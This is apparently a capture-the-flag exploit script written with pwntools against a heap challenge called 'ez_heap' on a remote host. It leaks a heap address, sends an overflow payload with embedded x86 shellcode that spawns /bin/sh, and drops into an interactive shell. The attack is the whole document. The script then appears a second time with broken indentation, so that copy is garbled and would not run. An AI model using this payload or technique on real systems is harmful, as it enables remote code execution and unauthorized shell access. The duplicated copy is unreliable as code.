crixpwn/ezheap.py

## ezheap.py
from pwn import *

#p = process("./ez_heap")
p = remote("52.199.49.117", 10003)

def getHeaptr():
	buf = p.recvline()
	heaptr = int(buf[:-1], 16)

	log.info("heap: " + hex(heaptr))

	return heaptr

def pwn(heaptr):
	p.sendline("4")
	p.sendline("0")

	p.sendline("3")

	p.sendline(p32(heaptr + 0x100) * 4 + "A" * 0x120 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80")

	p.sendline("3")
	p.sendline(" ")

	p.recvuntil("Main\n")
	p.recvuntil(">>> ")
	p.recvuntil(">>> ")

	p.interactive()

def main():
	heaptr = getHeaptr()

	pwn(heaptr)

if __name__=='__main__':
	main()
	from pwn import *

	#p = process("./ez_heap")
	p = remote("52.199.49.117", 10003)

	def getHeaptr():
	buf = p.recvline()
	heaptr = int(buf[:-1], 16)

	log.info("heap: " + hex(heaptr))

	return heaptr

	def pwn(heaptr):
	p.sendline("4")
	p.sendline("0")

	p.sendline("3")

	p.sendline(p32(heaptr + 0x100) * 4 + "A" * 0x120 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80")

	p.sendline("3")
	p.sendline(" ")

	p.recvuntil("Main\n")
	p.recvuntil(">>> ")
	p.recvuntil(">>> ")

	p.interactive()

	def main():
	heaptr = getHeaptr()

	pwn(heaptr)

	if __name__=='__main__':
	main()